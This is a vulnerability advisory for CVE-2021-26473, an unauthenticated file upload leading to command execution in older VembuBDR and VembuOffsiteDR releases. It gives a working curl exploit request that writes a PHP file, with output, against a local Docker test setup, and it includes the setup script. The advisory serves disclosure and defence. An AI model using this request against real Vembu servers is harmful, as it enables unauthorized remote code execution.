Skip to the content.

CVE-2021-26473

Unauthenticated arbitrary file upload and command execution in Vembu products

CVE CVE-2021-26473
Title Unauthenticated arbitrary file upload and command execution in Vembu products
Case DIVD-2020-00011
Credits
CVSS
References
Problem type(s) n/a
Date published 07 Jul 2021 00:00 CEST
Last modified 04 Feb 2022 22:33 CET

Description

In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1 the http API located at /sgwebservice_o.php action logFilePath allows an attacker to write arbitrary files in the context of the web server process. These files can then be executed remotely by calling the file via the web server.


How to reproduce

Step 1:Start up a docker environment (see below)

Step 2: In a different terminal run the following command:

$ curl 'http://localhost:6060/sgwebservice_o.php?Action=logFilePath&path=./my_php_info.php&value=%3C%3Fphp%20phpinfo%28%29%20%3F%3E%0A'
 
<StoreGrid><Message Error="1" Message="Successfully written." Code="500" /></StoreGrid> 

Step 3: validate that a file was written:


$ docker exec VembuBDR4201 /bin/bash -c "cd /home/vembubdr/Vembu/VembuBDR/htmlgui;ls -l my_*;echo ---;cat my_*;echo ---"
-rw-r--r-- 1 www-data www-data 19 Feb 11 15:35 my_php_info.php
---
<?php phpinfo() ?>
---

Call the script to get command execution:

$ curl 'http://localhost:6060/my_php_info.php'
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; color: #222; font-family: sans-serif;}
pre {margin: 0; font-family: monospace;}
a:link {color: #009; text-decoration: none; background-color: #fff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse; border: 0; width: 934px; box-shadow: 1px 2px 3px #ccc;}
.center {text-align: center;}
.center table {margin: 1em auto; text-align: left;}
.center th {text-align: center !important;}
td, th {border: 1px solid #666; font-size: 75%; vertical-align: baseline; padding: 4px 5px;}
th {position: sticky; top: 0; background: inherit;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccf; width: 300px; font-weight: bold;}
.h {background-color: #99c; font-weight: bold;}
.v {background-color: #ddd; max-width: 300px; overflow-x: auto; word-wrap: break-word;}
.v i {color: #999;}
img {float: right; border: 0;}
hr {width: 934px; background-color: #ccc; border: 0; height: 1px;}
</style>
<title>PHP 7.4.3 - phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
…

Impact

This vulnerability allows an attacker to upload an arbitrary file in the context of the web server and then execute it.

About the docker test environment.

In order to set up the docker test environment, we used the following script:

#!/bin/bash
 
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi
 
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v  $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
 
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do 
  echo -c "."
  sleep 1; 
done
echo
 
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done
 
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
 
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do 
  echo -c "."
  sleep 1; 
done
echo 

JSON version.